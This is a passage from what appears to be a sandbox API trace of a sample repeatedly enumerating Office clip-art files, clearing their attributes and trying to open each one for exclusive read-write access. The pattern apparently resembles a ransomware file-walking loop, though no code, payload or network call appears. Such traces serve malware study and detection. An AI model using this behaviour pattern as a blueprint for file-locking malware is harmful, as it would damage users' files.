0xffffffffffffffff [0133.896] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.896] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.897] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.897] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.897] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF", dwFileAttributes=0x80) returned 0 [0133.898] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00008_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.898] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.898] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.898] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.898] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.898] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF", dwFileAttributes=0x80) returned 0 [0133.899] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00012_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.899] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.899] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.899] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.899] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.900] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF", dwFileAttributes=0x80) returned 0 [0133.900] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00045_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.900] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.900] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.900] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.900] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.900] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF", dwFileAttributes=0x80) returned 0 [0133.900] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00098_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.901] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.901] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.901] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.901] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.901] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF", dwFileAttributes=0x80) returned 0 [0133.902] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00105_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.902] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.902] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.902] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.902] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.903] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF", dwFileAttributes=0x80) returned 0 [0133.903] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00122_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.903] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.903] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.903] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.903] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.903] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF", dwFileAttributes=0x80) returned 0 [0133.903] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.904] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.904] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.904] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.904] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.904] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF", dwFileAttributes=0x80) returned 0 [0133.904] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00148_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.904] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.904] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.905] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.905] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.905] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF", dwFileAttributes=0x80) returned 0 [0133.905] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00152_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.905] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.905] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.905] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.905] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.906] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF", dwFileAttributes=0x80) returned 0 [0133.906] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00194_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.906] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.906] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.906] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.906] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.906] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF", dwFileAttributes=0x80) returned 0 [0133.907] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.907] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.907] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.908] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.908] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.908] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF", dwFileAttributes=0x80) returned 0 [0133.908] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.908] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.908] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.908] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.908] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.909] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF", dwFileAttributes=0x80) returned 0 [0133.909] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.909] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.909] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.909] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.909] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.909] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF", dwFileAttributes=0x80) returned 0 [0133.910] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.910] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.910] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.910] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.910] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.910] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF", dwFileAttributes=0x80) returned 0 [0133.910] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.911] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.911] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.911] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.911] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.911] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF", dwFileAttributes=0x80) returned 0 [0133.911] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.911] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.911] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.912] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.912] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.912] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF", dwFileAttributes=0x80) returned 0 [0133.913] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00254_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.913] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.913] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.913] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.913] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.913] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF", dwFileAttributes=0x80) returned 0 [0133.913] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.913] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.914] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.914] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.914] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.914] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF", dwFileAttributes=0x80) returned 0 [0133.915] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.915] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.915] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.915] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.915] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.915] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF", dwFileAttributes=0x80) returned 0 [0133.915] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.916] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.916] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.916] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.916] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.916] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF", dwFileAttributes=0x80) returned 0 [0133.916] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.916] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.916] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.916] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.916] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.916] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF", dwFileAttributes=0x80) returned 0 [0133.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.917] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.917] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.917] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.917] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.917] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF", dwFileAttributes=0x80) returned 0 [0133.918] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.918] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.918] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.918] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.918] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.918] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF", dwFileAttributes=0x80) returned 0 [0133.918] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.918] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.918] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.918] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.918] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.919] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF", dwFileAttributes=0x80) returned 0 [0133.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.919] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.919] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.919] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.919] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.919] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF", dwFileAttributes=0x80) returned 0 [0133.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.919] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.919] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.920] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.920] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.920] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF", dwFileAttributes=0x80) returned 0 [0133.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.920] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.920] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.921] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.921] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.921] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF", dwFileAttributes=0x80) returned 0 [0133.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.921] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.921] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.921] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.921] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.921] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF", dwFileAttributes=0x80) returned 0 [0133.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.922] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.922] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.922] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.923] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.923] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF", dwFileAttributes=0x80) returned 0 [0133.923] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program 